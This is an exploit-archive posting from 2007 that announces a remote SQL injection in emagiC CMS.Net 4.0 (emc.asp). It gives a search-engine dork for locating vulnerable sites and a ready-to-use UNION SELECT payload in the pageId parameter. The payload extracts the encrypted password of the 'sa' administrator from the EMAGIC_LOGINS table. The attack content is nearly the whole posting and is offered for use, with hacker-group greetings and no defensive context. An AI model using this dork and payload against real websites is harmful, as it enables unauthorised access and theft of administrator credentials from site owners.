emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability
# Published : 2007-10-28
# Author : hak3r-b0y
# Previous Title : CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability
# Next Title : FireConfig 0.5 (dl.php file) Remote File Disclosure Vulnerability

--------------------

emagiC CMS.Net v4.0 Remote SQL Injection Exploit

--------------------

+ Found  : hak3r-b0y
+ Gr33tz : darko , V4 CrackerS , hacker_alQassam , Ans , Barra, all ans-hacker.com members
+ Script URL : http://www.emagic-cms.com/
+ D0rk : inurl:emc.asp?pageid=
--------------------

Exploit:

emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username='sa'--

y0u will find the crypted password

for the admin 'sa'
--------------------

ContacT: mohamed_amine_1991@hotmail.com

--------------------

# www.Syue.com [2007-10-28]